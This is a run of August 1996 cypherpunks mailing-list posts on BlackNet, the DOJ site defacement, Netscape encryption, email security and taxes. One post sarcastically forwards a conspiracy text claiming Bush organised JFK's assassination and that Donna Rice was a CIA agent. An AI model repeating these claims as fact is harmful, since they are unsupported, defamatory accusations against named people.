Message-ID: <199608201616.JAA18450@adnetsol.adnetsol.com>
MIME-Version: 1.0
Content-Type: text/plain


On Or About 19 Aug 96, 18:40, Timothy C. May wrote:

> At 1:05 PM 8/19/96, Ross Wright wrote:
> >
> >My question to the list:
> >
> >Who benefits from all this publicity and brew-ha-ha?  Who makes all
> >the BlackNet money?  Who really cares if it is a Data Haven or just
> >a remailer?  I'm just asking.
> 
> Well, obviously I do. I receive $1.42 for every posting which
> mentions BlackNet, 7% of gross sales for all commercial
> transactions, and 12.5% plus a sliding finder's fee for all military
> and intelligence secrets sold via BlackNet.
> 
> But all true paranoiacs knew this.
> 
> --Aldrich Ames
> 
Hey, It's not funny.  So this is freeware?  I thought someone offered 
3 mil for the program.  Tim, you wrote this thing?  So who owns it 
now?  Can it be owned?  Maybe I misunderstand.

Ross

===========
Ross Wright
King Media: Bulk Sales of Software Media and Duplication Services
http://www.slip.net/~cdr/kingmedia
Voice: 415-206-9906




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Lynne L. Harrison" <lharrison@csbh.mhv.net>
Date: Wed, 21 Aug 1996 01:55:31 +0800
To: cypherpunks@toad.com
Subject: Re: Hackers invade DOJ web site
Message-ID: <1.5.4.16.19960820135236.0ca75906@pop.mhv.net>
MIME-Version: 1.0
Content-Type: text/plain


At 07:08 PM 8/19/96 -0500, Igor Chudov wrote:
>
>I personally find the web page very well and artistically done, and
>extremely funny. The guy who did it had a good taste.

  I personally found the page to be offensive and disagree highly with the
person having "good taste".
  Following the premise that another posted to this list, there were ways of
focusing on opposing the CDA without insulting women and/or minorities.  I
also agree that this act is going to backfire by giving the DOJ fodder when
the case reaches the Supreme Court.
  IMO, it was patently obvious that it was a kid or kids that did it who
gave no substantial thought on the consequences of his/their act.


  

************************************************************
Lynne L. Harrison, Esq.       |    "The key to life:
Poughkeepsie, New York        |     - Get up;
lharrison@mhv.net             |     - Survive;
http://www.dueprocess.com     |     - Go to bed."
************************************************************

DISCLAIMER:  I am not your attorney; you are not my client.
             Accordingly, the above is *NOT* legal advice.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <rich@c2.org>
Date: Wed, 21 Aug 1996 05:47:59 +0800
To: cypherpunks@toad.com
Subject: Re: Indonesia detains democracy activist after post to mailing  list (fwd)
In-Reply-To: <199608201454.HAA04784@dns2.noc.best.net>
Message-ID: <Pine.GUL.3.95.960820090807.8262A-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 20 Aug 1996, James A. Donald wrote:

> At 03:18 PM 8/19/96 -0700, Rich Graves wrote:
> > You know, Amnesty
> > has some outstanding policies regarding accuracy, objectivity, and
> > universality.
> 
> Such as their policy that disappearances in Cuba are only mentioned in 
> a vague and euphemistic way somewhere in the fine print of the middle
> of their Cuban reports, whereas similar disappearances are shouted from
> the rooftops when they happen in right wing South American dictatorships?

In a word, no. I wasn't talking about their policy to oppress the Easter
Bunny, either. 

I meant their policy of not taking sides, which in Latin America has often
meant that they have less of a left-wing bias than Human Rights Watch. They
do not describe people with loaded terms like "pro-democracy," "worker's
rights advocate," "freedom fighter," or "social justice activist." They say
"this person is in prison for political reasons," and leave it at that.
Usually, they don't even identify the reasons -- just the abuse of state
power.

I've always favored a carefully tailored formalistic approach to human
rights and free speech issues, without taking sides on the underlying issues
of political controversy. Amnesty and the ACLU generally follow this
approach. When they have deviated from that approach to make sweeping
statements not tied to *individual* human rights, as Amnesty's general
opposition to apartheid and the ACLU's guarded support for majority-minority
gerrymandering, I have opposed them.

Happily, most of the time, they stay above the fray, which I believe is the
only appropriate role for a "human rights organization." I have no objection
to anti-communist, anti-fascist, or whatever organizations, but I don't
think they should bill themselves as human rights organizations. The
Wiesenthal Center to be a "human rights organization"; it's an anti-fascist
organization, which does some good, some bad, but always focused on one
issue. Human Rights Watch didn't start out as a "human rights organization"; 
it started out as an anti-communist organization. They have since broadened
their scope and international coverage considerably, but their history of
making substantitive statements on larger political questions remains.
Ironically, now they tend to show a leftist bias.

-rich





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: =?ISO-8859-1?Q?J=FCri_Kaljundi?= <jk@stallion.ee>
Date: Tue, 20 Aug 1996 17:11:14 +0800
To: Ian Goldberg <iang@cs.berkeley.edu>
Subject: Re: Final release of Navigator (with strong crypto) now available
In-Reply-To: <4vb5ud$skn@abraham.cs.berkeley.edu>
Message-ID: <Pine.GSO.3.93.960820100154.11840A-100000@nebula>
MIME-Version: 1.0
Content-Type: text/plain


 19 Aug 1996, Ian Goldberg wrote:

> >  No, we will only be supplying ELF.  Since linux is not officially
> >supported, we really don't have the resources to do multiple versions.
> >
> Not to mention that plugins are virtually impossible with a.out...

You really think someone will write plug-ins for Unix versions of
Netscape? I am not so sure.

Jüri Kaljundi
AS Stallion
jk@stallion.ee





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <rich@c2.org>
Date: Wed, 21 Aug 1996 06:19:25 +0800
To: cypherpunks@toad.com
Subject: Re: CIA Contra Crack and LA Gangs (fwd)
In-Reply-To: <Pine.SOL.3.91.960820073933.6866N-100000@use.usit.net>
Message-ID: <Pine.GUL.3.95.960820100659.8541A-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Tue, 20 Aug 1996, Brad Dolan wrote:

> Roger Morris has documented the base story nicely, first in an article 
> intended for the Washington Post (but which wound up in Penthouse when the 
> Post got cold feet) and now in a book, _Partners in Power_.

You're joking, right? I must admit that the irony of a story fabricated by
the far left being used against the left by the far right is delicious. 

Just in case you're serious, if you liked Partners in Power, you'll love
this... 

- -rich

             Gary Hart, George Bush, and Michael Williams

Lean forward in your chairs a little more. Get a little closer to the
monitor. You need to read every word of this, and slowly.

Senator Gary Hart, the man the overwhelming majority of Americans wanted
to be their President in 1988, was eliminated from the U.S. Presidential
race he was expected to win with the biggest landslide in American
history. His elimination from the race was engineered by vice president
(and former C.I.A. Director) George Bush, whose father, Senator Prescott
Bush, personally financed the political career of Adolf Hitler. 

Bush employed the use of the C.I.A. and other less official criminal
organisations to accomplish his goal of eliminating Hart from the race
after I refused to sabotage the Hart campaign and set Hart up for a
false arrest. The key C.I.A. operative in the scheme to eliminate Hart
from the race was international prostitute, Donna Rice.

After Bush and his band of scary men succeeded in eliminating Hart from
the race, I convinced him to re-enter it, something no one had ever done
before. I formed the "Draft Hart Committee", resurrected his campaign,
and managed it, until he was once again eliminated from the race by Bush
and his C.I.A. co-conspirators. 

As my "reward" for my work with the Man Who Would Be President, the
fascist criminal tyrant, George Bush, had the F.B.I. arrest me (without
any warrant or indictment), torture me for two years, break up my
family, arrange for the kidnap of my two small daughters, seize
virtually all of my significant assets and property, and, after several
assassination attempts failed (as had the attempted Bush-ordered C.I.A.
assassination of Senators Gary Hart and William Cohen when they flew to
Nicaragua on an Iran-Contra fact-finding mission) exile me to
Switzerland, where I have remained ever since, unable to safely return
to America, the land of my birth.

The story has never been told. Not one American publisher has the
courage to publish it.

It is fashionable in the United States to be a coward today. In the past
nine years, I have been unable to find an attorney willing to properly
represent me in my single-handed fight against the F.B.I. and U.S.
government, which continues to this day, lasting longer than World War
II. 

So, as it stands, the American people did not get the President they
wanted. Instead of President Hart, they got President Bush, who, along
with Richard M. Nixon and Lyndon B. Johnson led the conspiracy to
assassinate President John F. Kennedy on 22. November 1963 and the coup
d'etat it began. Each of the three men then took turns playing "El
Presidente" ... each of them were nothing more than four-year dictators.

For my role in defending America's liberty and right to vote, I lost
everything I had. The story ... has never been told. Just like the story
of the JFK assassination. You can visit my web site at:

http://www.iahushua.com/mbw.html

There, you will find enough information about what George Bush and the
fascist U.S. government did to me and my family to ruin your dinner.

Eight days ago, when George Bush visited his numbered bank accounts here
in Berne, one of the highest-ranking officers of the United States
government threatened my life in person. As a matter of fact, I am
risking my life by writing this. Even though very few, if any of you,
give a damn about what happened to me last Wednesday, or that fateful
day of 18 March 1988, when jack-booted thugs with badges broke into my
peaceful Rocky Mountain home, I am here to tell you about it, because,
as Americans, all of you who sit there on your sofas with your cans of
beer and bags of potato chips, doing nothing while your country sinks
even farther down the tubes, into a fascist police state, the likes of
which the world has never known ... you are all, each and every one of
you, equally as responsible for my pain and for the pain of your fellow
patriotic countrymen as George Bush and his gang of liars, traitors and
thieves. 

Little by little, the truth is trickling out. As I risk my life today, I
now give to you the opportunity to read an article put out by another
group of brave people. You lost your chance for President Hart to save
your nation. Now, read for yourself how the fascist criminal tyrant drug
dealer, George Herbert Walker Bush, who introduced heroin and other
hard drugs to the children of America, prevented you from voting for the
only man who loved his country enough to save it from what it has now
become.

Michael Williams
Patriot in Exile
06/20/96


              Conspiracy Nation -- Vol. 8  Num. 19
             ======================================
                    ("Quid coniuratio est?")

- -----------------------------------------------------------------
 
WHO IS DONNA RICE HUGHES?
=========================
 
Following the  recent  much-cheered  ruling  by  3 federal judges
which, for the moment anyway,  has  over-ruled  the  Clinton  law
against  "indecency"  on  the  Internet,  I noticed a woman named
Donna Rice Hughes appearing on the  TV networks.  She was said to
be with a group called "Enough is Enough", said to  be  organized
to  protect  children  against  pornographers  supposedly lurking
everywhere in cyberspace. 
 
Donna Rice Hughes.  Take away  the  "Hughes" and what do you get?
You  get  "Donna  Rice",  nemesis  to   1988   Democratic   Party
presidential  candidate  Gary  Hart.   You may remember how Hart,
looking  strong  as   the   potential   candidate,  was  sunk  by
allegations of his shocking (as in "I am shocked...   *shocked*")
affair with "party girl" Donna Rice.  Seems pretty tame, compared
with Lothario Bill Clinton's escapades, but for "some reason" the
mainstream  press  really  sat up and took notice, playing up the
affair for the couch potatoes in TV land.
 
So *if* this is the same Donna  Rice, one wonders if she has "got
religion"  or  if  the CIA has merely given her a new assignment:
working to shut down freedom of  speech under the guise of saving
our  children  from  pornography.   (You  remember  "saving   our
children",  don't  you?  Like with President Nixon in 1969 saying
he wants to "save our children" from drugs?)
 
Reading in the recent book by  Dr.  Roger  Morris,  *Partners  in
Power*,  one  finds  further background on former candidate Hart.
On March 27, 1987, Billy Clinton is sucking up to Hollywood types
on the west coast.   At  an  exclusive dinner, King Clinton dines
with, among others, Don Henley, formerly of the Eagles rock band.
Close friend to Henley is Donna Rice, who is at about  that  time
boarding a yacht called the *Monkey Business*.
 
Young  Senator  Hart  had  been  on  the  Church  committee which
investigated the CIA  and  its  ties  to  organized crime.  After
that, he was  on  the  Senate  Intelligence  Oversight  Committee
where,  says  Morris, he continued a relentless effort to uncover
CIA hanky-panky.  Hart strongly opposed the Nicaraguan Contra war
and was skeptical of the official  "Oswald did it" version of the
JFK assassination.  Mobster Santos Trafficante is alleged to have
stated, regarding Hart:  "We need to get rid  of  the  son  of  a
bitch."
 
Hart seems to have been  set  up, says Morris, and gives evidence
to back up the claim.  Readers  of  Conspiracy  Nation  are  most
likely  well-aware  as  to  how  CIA/Mafia have often used "party
girls" to compromise  and/or  ruin  politicians.   Was Donna Rice
just a "party girl", or was she more than  that?   And  just  who
*is*  this  person  called "Donna Rice Hughes" of an organization
called "Enough is Enough"?  Did "somebody" get a promotion?
 
- -----------------------------------------------------------------
     I encourage distribution of "Conspiracy Nation."
- -----------------------------------------------------------------
If you would like "Conspiracy Nation" sent to your e-mail 
address, send a message in the form "subscribe cn-l My Name" to 
listproc@cornell.edu          (Note: that is "CN-L" *not* "CN-1")
- -----------------------------------------------------------------
    For information on how to receive the improved Conspiracy 
  Nation Newsletter, send an e-mail message to bigred@shout.net
- -----------------------------------------------------------------
Want to know more about Whitewater, Oklahoma City bombing, etc? 
(1) telnet prairienet.org (2) logon as "visitor" (3) go citcom
- -----------------------------------------------------------------
       See also: http://www.europa.com/~johnlf/cn.html
- -----------------------------------------------------------------
          See also: ftp.shout.net  pub/users/bigred
- -----------------------------------------------------------------
Aperi os tuum muto, et causis omnium filiorum qui pertranseunt.
Aperi os tuum, decerne quod justum est, et judica inopem et 
  pauperem.                    -- Liber Proverbiorum  XXXI: 8-9

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQBVAwUBMhn1OJNcNyVVy0jxAQGP/AIAyVm3nT87lX6looOpnQumn6xJtlK9YOwD
tBQCD3ol3PmzQof5JFX+agirdIZxUGC1/hhC0a3xMjtaBT1/y0KXvw==
=8Uaz
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: skeeve@skeeve.net (Skeeve Stevens)
Date: Tue, 20 Aug 1996 11:23:26 +0800
To: nick@multipro.com (Nick West)
Subject: Re: Hackers invade DOJ web site
In-Reply-To: <199608191642.LAA07079@server.multipro.com>
Message-ID: <199608200036.KAA08028@zztop.myinternet.net>
MIME-Version: 1.0
Content-Type: text


You, Nick West, said about something or other:
+
+At 06:46 PM 8/18/96 -0700, you wrote:
+>> CNN online (http://www.cnn.com) is reporting a "breakin" by "hackers"
+>> to the DOJ web site.  They don't elaborate exactly how thy did it.
+>
+>Did anyone save a copy of the altered web page?  I would like to see
+>what the crackers did.
+>
+>Thanks.
+>
+>
+They showed a the page on CNN Headline News yesterday. They might show it
+sometime again today, stay tuned.


Altavisa/Yahoo search "Department of Injustice"


--------------------------------------------------------------------
Skeeve Stevens                              Email: skeeve@skeeve.net
CEO/The Big Boss/All round nice guy      URL: http://www.skeeve.net/
MyInternet                               Australian Anglicans Online
http://www.myinternet.net/               http://www.anglican.asn.au/
Phone: (+612) 869-3334        Mobile: (0414) SKEEVE [+61414-753-383]
Key fingerprint  =  D2 7E 91 53 19 FE D0 5C  DE 34 EA AF 7A 5C 4D 3E




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jbugden@smtplink.alis.ca
Date: Wed, 21 Aug 1996 03:01:00 +0800
To: tcmay@got.net (Timothy C. May)
Subject: RE: [NOISE] Naked woman decrapitates man on Internet!!!
Message-ID: <9607208405.AA840563232@smtplink.alis.ca>
MIME-Version: 1.0
Content-Type: text/plain


tcmay@got.net (Timothy C. May) wrote:
>Seven billion (thousand million for you Brits) people in the world. More
>than 10,000 deaths every hour, or about 5 deaths per second.

>What's so sick about one measly death? Just another crime, like >thousands of
others every day. They just got caught. At least he's >immortalized on the Net.

Only 24 hours in each day. How do you spend your time?

James

Spray my name on a subway train
Carve my name in a video game
Out looking for the camera crew
Sell my soul for a second on the six-o'clock news
Gonna live 'til the bubble pops
Hold my breath when the big one drops
Immortality is what I'm buying
But I'd rather be immortal
                by not dying.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Erik E. Fair" (Time Keeper) <fair@cesium.clock.org>
Date: Wed, 21 Aug 1996 06:22:09 +0800
To: cmcurtin@research.megasoft.com
Subject: Re: Securing Internet mail at the MTA level
Message-ID: <v02140b24ae3fa8d7849e@[17.255.9.110]>
MIME-Version: 1.0
Content-Type: text/plain


SSH, while a quite useful tool, is not the right long-term solution for
transport layer security - IP security is.

It's also clear to me that for E-mail, you don't want transport level
security for the system; you want "object" security, that is, digital
signature and encryption of the mail message. That way, no matter how many
MTAs the message passes through (and pretty much regardless of how
trustworthy they are) you have end-to-end authentication, integrity and
privacy.

        Erik Fair <fair@clock.org>






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian D Williams <talon57@well.com>
Date: Wed, 21 Aug 1996 06:12:00 +0800
To: cypherpunks@toad.com
Subject: Re:phoneco vs X-phone
Message-ID: <199608201800.LAA22929@well.com>
MIME-Version: 1.0
Content-Type: text/plain



Jim bell writes:

>What do you mean, "doesn't really fit the facts"?!?  What part of
>it was incorrect?  Fiber-optic _is_ commonly used in inter-office
>trunks, right? It doesn't wear out, right?  Higher usage doesn't
>entail greater costs, right?  The capacity, while not strictly
>infinite, is high enough so expanded usage doesn't strain most
>links, right?  Finally, modern phone switches have sufficient
>connect capacity so that they can handle usage which would have
>been considered "unusual" by yesteryear's standards.  All 
>of this points to an obvious conclusion:  Telephone companies do
>not, in general, have increased costs as a consequence of
>increased telephone usage.

Fiber does not wear out per se, but it does need replacing, partly
from the inevitable contractor accidents (landscapers) and
occasional entropic events. Mux cards and repeaters do go bad on a
regular basis, there is a correlation between usage and increased
maintenance, and of course increased usage means increased
electricity usage.

One point that seems to be missed here is the very high cost of
compliance with government regulations. If the internet phone
people have to comply with the same regulations it will drive up
their costs dramatically, and if the regulations are lifted for
all, the RBOC's think they can out compete them.

Thank you for your interesting post.

Brian

"Zazen? Well it beats sitting around on your ass all day doing
nothing."




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: grad 96 <cbarnett@eciad.bc.ca>
Date: Wed, 21 Aug 1996 15:09:59 +0800
To: cypherpunks@toad.com
Subject: raygun shielding
Message-ID: <Pine.SGI.3.91.960820105924.8084A-100000@oswald>
MIME-Version: 1.0
Content-Type: text/plain


not being an authority on the uses of X-Ray technology, I have no idea 
how useful tinfoil or gold lamme would be for shielding. As a 
professional photographer, I do know that one can purchase lead lied bags 
to protectect one's film from being ruined by the X-Ray machines at the 
airport. They do not work. When the customs people come to an object in 
your bag that they can not see into, they turn up the power until they 
can. I have ruined film and customs officer testimony to back this up, 
that's why I have them do a visual inspection of my film. If you have a 
lot, they don't look very hard, which has it's own bundle of opportunity 
right there. Not that I am advocating that kind of behavior.

clint barnett
lord of the cosmos
emily carr institute





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Wed, 21 Aug 1996 03:24:55 +0800
To: Gary Howland <gary@systemics.com>
Subject: Re: search engine improvement
In-Reply-To: <3219B61D.7566F4CF@systemics.com>
Message-ID: <Pine.SUN.3.91.960820110529.9582A-100000@tipper.oit.unc.edu>
MIME-Version: 1.0
Content-Type: text/plain


The idea of sharing ratings on the web is literally as old as the web; 
it was part of the original idea (remember the original client was also an 
editor). 



 ---
Cause maybe  (maybe)		      | In my mind I'm going to Carolina
you're gonna be the one that saves me | - back in Chapel Hill May 16th.
And after all			      | Email address remains unchanged
You're my firewall -    	      | ........First in Usenet.........




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Wed, 21 Aug 1996 06:24:33 +0800
To: qut@netcom.com (Roger Healy OBC)
Subject: Re: [RANT] Death of Usenet: Film at 11
Message-ID: <199608201816.LAA22095@netcom8.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:21 PM 8/19/96 -0700, Roger Healy OBC wrote:
>ON
>> 
>> At  1:34 PM 8/19/96 -0700, Mike Duvos wrote:
>> >Permit me to go off in an orthogonal direction here and say that
>> >I think that we should do away with the concept of a pre-ordained
>> >newsgroups in Usenet entirely, in favor of an IRC-like dynamic 
>> >creation of message pools.
>> 
>> Moderated newsgroups gain reputation from their moderation policies and
>> probably should not be included in this scheme.
>
>Moderated newsgroups have very few posts because hardly anyone reads 
>them.  I second the above propsed IRC-like scheme if it only would apply 
>to moderated groups, because of IRC's bad reputation of moderation.

Don't confuse quantity with quality.  When I want a FAQ for some area I
don't normally follow, I go to news.answers.  I know I won't be buried in
social good times the way someone who wants to know about cryptography is
buried when they go to cyperpunks.  I have no such assurance if I were to
go to the news group which created the FAQ.

The reason there are so many different models on the net is they each serve
a purpose.  Don't make the mistake of trying to jam everything into one
mold.

Bill


-------------------------------------------------------------------------
Bill Frantz       | Cave ab homine unius lebri | Periwinkle -- Consulting
(408)356-8506     |  [Beware the man of one    | 16345 Englewood Ave.
frantz@netcom.com |   book]  - Anonymous Latin | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Wed, 21 Aug 1996 08:07:02 +0800
To: Ted Cabeen <cypherpunks@toad.com
Subject: Re: Netscape 3.0 and encryption choices
Message-ID: <199608201820.LAA22622@netcom8.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At  1:04 AM 8/20/96 -0700, Ted Cabeen wrote:
>In Netscape 3.0, the program allows the user to specify which encryption
>standards to allow connections with.  It allows encryption with 128-bit RC4,
>128-bit RC2, and 156-bit(I think)3DES.  Of these three, which would be the
>most secure method?

The gereral consensus of the experts is that 168 bit 3DES is the best
choice.  DES has been well studied, 168 bit keys are large enough to be
safe, and the ITAR forbids its export.  (ITAR also forbids export of 128
bit cyphers as well, but ITAR is the only NSA approved reputation agent for
crypto, so we use what we have.)


-------------------------------------------------------------------------
Bill Frantz       | Cave ab homine unius lebri | Periwinkle -- Consulting
(408)356-8506     |  [Beware the man of one    | 16345 Englewood Ave.
frantz@netcom.com |   book]  - Anonymous Latin | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: C Matthew Curtin <cmcurtin@research.megasoft.com>
Date: Wed, 21 Aug 1996 04:05:18 +0800
To: cypherpunks@toad.com
Subject: Securing Internet mail at the MTA level
Message-ID: <199608201529.LAA01469@goffette.research.megasoft.com>
MIME-Version: 1.0
Content-Type: text/plain



Hi,

Recently, I've been looking into securing email at the MTA level, and
would like to get your thoughts on implementation possibilities and
related issues.

The problems that I'm trying to solve are:
    1. Host authentication
    2. Data privacy

In order for the widespread encryption to work, several things need to
occur:
    1. Phase-in of the new stuff
    2. Backward compatibility (ability to continue to work in the
       clear) for a period of years
    3. A single worldwide mechanism, defined by an RFC, and freely
       available, except, perhaps, in the case of commercial
       MTAs. (i.e., the use of RSA seems appropriate for host and
       session key management, and is free via RSAREF in the US, free
       outside of the US, but not free for commercial use. This seems
       acceptable to me.)

Two types of approaches are possible:
    1. Adding to the SMTP protocol itself, allowing for MTAs to
       identify crypto-capable peers, and then performing
       authentication and session encryption where possible.
    2. Waiting for a cryptographic transport layer network protocol
       (such as what is being proposed in draft-ietf-tls-ssh-00),
       allowing SMTP to remain untouched, and only requiring MTAs to
       add support for the new network protocol.

I like the second approach better, because it allows more problems to
be solved with one move, and it would be easier to add crypto
functionality to our common network utilities by simply making them
aware of the new transport layer protocol. The first approach would
require redefinitions of RFCs for each of the services, and lots of
redundant work.

I mentioned my interest in an SSH-capable MTA to Tatu Ylonen
<ylo@ssh.fi>, and he as also expressed interest. The word from him on
the status of the SSH Internet Draft is that a reference
implementation should be available early next month. I'm considering
using that reference implementation to add SSH capability to an MTA,
perhaps sendmail.

My questions are:
    1. Which of the two approaches seems to make the most sense to
       you?
    2. Is there another approach that could work better?
    3. Is there interest in adding SSH functionality to sendmail in
       the near future (either by the draft spec, or once the RFC has
       been published)?

Please feel free to pass this around, if you deem appropriate. I'm
interested in lots of feedback before deciding if and how to go ahead
with the project.

Thanks.

-- 
C Matthew Curtin        MEGASOFT, LLC        Director, Security Architecture
I speak only for myself.  Don't whine to anyone but me about anything I say.
Hacker Security Firewall Crypto PGP Privacy Unix Perl Java Internet Intranet
cmcurtin@research.megasoft.com http://research.megasoft.com/people/cmcurtin/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Wed, 21 Aug 1996 06:23:37 +0800
To: Ross Wright <rwright@adnetsol.com>
Subject: Re: Naked woman decapitates man on Internet!!!
In-Reply-To: <199608200525.WAA07745@adnetsol.adnetsol.com>
Message-ID: <Pine.LNX.3.93.960820114605.162A-100000@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 19 Aug 1996, Ross Wright wrote:
> On Or About 19 Aug 96, 20:37, Timothy C. May wrote:
> > At 2:00 AM 8/20/96, Lucky Green wrote:
> > >On Mon, 19 Aug 1996, Mark O. Aldrich wrote:
> > >> On Mon, 19 Aug 1996, Rich Graves wrote:
> > >> http://www.grotesque.com/
> > >That was intense...
> > But not as intense as it could be with Internet video!
> Sick, stuff.  Yet everyone has to sneek a peek, just like a car 
> crash.  Hey, I did.  I made the whole trip through the lurid pages.

    Yes, those two were a little sick, but I thought the pictures a little 
tame. They showed a total lack of imagination. Booorrrrriiiinnnngggg. 

    Then again, in a past existence I worked as a registration clerk in an
emergency room, so it takes a bit to turn my stomach (visually, smells _still_
get to me.) 


Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@smoke.suba.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Will Day <willday@rom.oit.gatech.edu>
Date: Wed, 21 Aug 1996 04:01:51 +0800
To: fstuart@vetmed.auburn.edu (Frank Stuart)
Subject: Re: Hackers invade DOJ web site
In-Reply-To: <199608180942.EAA08054@snoopy.vetmed.auburn.edu>
Message-ID: <199608201554.LAA04383@rom.oit.gatech.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

A short time ago, at a computer terminal far, far away, Frank Stuart wrote:
>however, I think those in a position to do so should start with the spin
>control.  Some suggestions:
>
>   The fact that even the U.S. Justice Department is unable to adequately
>   protect it's own site from intruders underscores the need for widely-
>   available strong encryption.
>
>   While this is certainly a major embarrassment for the Justice Department,
>   at least the mandatory "key escrow" program the Clinton administration is
>   insisting upon has not yet been implemented; no private citizens' data
>   appears to have been compromised this time.
>
>   It's doubtful that a new law or government bureaucracy would have prevented
>   this from happening but it's entirely possible that tools such as strong
>   encryption could have.  It's ironic that the U.S. Government is focusing on
>   the former while fighting use of the latter.

I understand how it affects their claim for the security of escrowed
keys, but I'm afraid I don't follow the other argument.  How would the
wide availability of strong encryption have helped prevent the breakin?
How would encryption in general prevent breakins?  I'd love to use this
as an argument for strong encryption, but I don't see how it really
applies.

===
Will Day       <PGP mail preferred>           *  *  *  *  *  *  *  *  *  *  *
willday@rom.oit.gatech.edu                      HARRY BROWNE FOR PRESIDENT
http://rom.oit.gatech.edu/~willday/            http://www.HarryBrowne96.org/
OIT, Georgia Tech, Atlanta 30332-0715         *  *  *  *  *  *  *  *  *  *  *
  =->  Opinions expressed are mine alone and do not reflect OIT policy  <-=

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3
Charset: noconv

iQCVAwUBMhnfhRDHlOdPw2ZdAQHIagQAktlsSEN4Ojt54JwZqWIujZ3BDc9n8e5D
tokubxvVSdMyh9v/xVhVBfIOne1/+htiMdTWHYch0ZrJGqPR3rbicnuVm57Qq964
KMR9E3P9jNBgo+V9J3V01GcT3+VzxyOMTKqq64fLlRDnF1dg+UNWfCxNYc3bQnw+
HvYOMUv8mqs=
=k72n
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 21 Aug 1996 12:05:44 +0800
To: cypherpunks@toad.com
Subject: Pappieren, bitte! (and Taxes, National Debt)
Message-ID: <ae3f5aed030210049231@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:38 PM 8/20/96, Stephen Cobb wrote:
>At 05:32 PM 8/19/96 -0400, you wrote:
>>It sounds unfair, for sure. However, the whole thing is a fraud based
>>upon a myth. FICA witholding is NOT credited to an individual's account,
>>or even to Social Security benefits in general. By statutory law, all
>>such receipts go into the Treasury's general fund.
>>
>>So, they are NOT "social security contributions". Period.
>>
>Very true...what I am saying is that, as far as my reading goes, LEGAL
>aliens are going to be required to pay social security "taxes" while not
>having any "entitlement" in return. They pay income taxes and get certain
>things, like law and order, in return. They will be paying soc sec money to
>the government without getting anything in return. This sounds not only
>unfair but wrong, part of an isolationist, "we killed the natives so this
>land is our land and the rest of you f@*k-off" revival that includes the
>recent posting about requiring proof of citizenship before issuing drivers
>licenses.

Not only will they not be legally able to drive, but as we all have been
discussing, driver's licenses are the de facto forms of identification
demanded by most merchants, most airlines, etc.

I think the "no driver's licenses to illegal aliens" makes a certain kind
of sense, though. (Not that I don't have some compassion for them, being an
open borders advocate.) If the State gives official documents to illegal
aliens, what's the point of their being classified as illegal aliens?

Ditto for the various taxes, income or SS or property or whatever. If the
State says to someone, "OK, you don't have to pay taxes because you're an
illegal alien," the chaos that would follow is clear.

Employers cannot withold taxes (income, state, SS) from some employees and
not from others.

(Of course, employers are expected to get a SS number from all employees,
so, in theory, illegal aliens would be unable to work without one....)

One final note on the Social Security mess. Not only is it not a true
insurance plan, with contributions being invested in a fund of some sort,
it is much worse than this. Contributions are sent immediately into the
"general fund," to be spent on B-2 bombers, new administrative buildings,
salaries of government workers, pork for Congressvarmints, Seawolf
submarines, space stations, welfare payments, foreign aid to Israel and
Egypt, and so on and so forth. What the govenment does is to send an
"I.O.U." to the Social Security people, promising to someday make good on
the money already spent.

Distressingly, but not surprisingly, these I.O.U.s are *NOT* counted as
part of the National Debt. Thus, the national debt is much worse than the
$5 trillion or so it is officially estimated to be.

One estimate I have seen places the overall national debt, counting
obligations and promised payments, at $20 trillion, or four times the
official number. And it is still increasing every year. To see how large
this is, there are 100 million taxpayers in the U.S., roughly. This means
each of these taxpayers has an average indebtedness of $200,000. Most
American households do not have this amount of money in total net worth,
obviously. Thus, they "owe" much more than they are worth.

Obviously enough, the portion of this debt is not distributed uniformly
amongst households, or won't be if it is ever collected. But you get the
drift. The country has been spending far more than it has been taking in
for many years, and is far worse shape than "official" figures about the
National Debt would tend to suggest.

Neither Dole nor Clinton appear to want to talk about this, both having
done their parts to make the situation what it is today.

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
